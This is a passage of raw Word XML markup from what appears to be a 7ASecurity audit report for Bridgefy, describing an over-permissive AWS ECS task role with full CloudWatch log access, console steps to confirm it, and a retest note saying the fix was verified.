          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid. Roles are correctly restricted to the necessary resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>makes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ECS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with excessive permissions. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ECS Task Role </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is an IAM assumed role which is used by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the task to access AWS resources and make API calls. Specifically, in the analyzed environment the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sdkDeployStackSDKECSSDKBridgefyTask Task Definition </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>OrderServiceEcsTaskRole </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as an IAM task role. The role was found to have excessive permissions as it has unrestricted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CloudWatch</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>manage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>log groups.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attackers,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>task,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>might</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leverage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>misconfiguration to remove all logs in the account, which may assist the erasure of compromise indicators. Unless centralized logging is implemented effectively, this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>might</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>turn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>make forensic analysis unfeasible in the event of a security breach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Resources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>745354931789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>target)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="96"/>
        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This issue can be confirmed by identifying the ECS Task, and verifying the IAM permissions attached to its assigned role as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ECS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>view,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="552" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId268">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/ecs/home?region=us-east-1#/taskDefinitions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Preview the definition of a task and locate the Task Role:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="552" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1561"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4391182" cy="2468499"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114" name="Image 114"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="114" name="Image 114"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId269" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4391182" cy="2468499"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="129"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Assigned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Now,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>attached</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>OrderServiceEcsTaskRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attached</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>allows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>unrestricted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CloudWatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>logs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487631872">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2049493</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>43207</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4135918" cy="3162300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="115" name="Image 115"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="115" name="Image 115"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId270" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4135918" cy="3162300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="129"/>
        <w:ind w:left="0" w:right="363" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
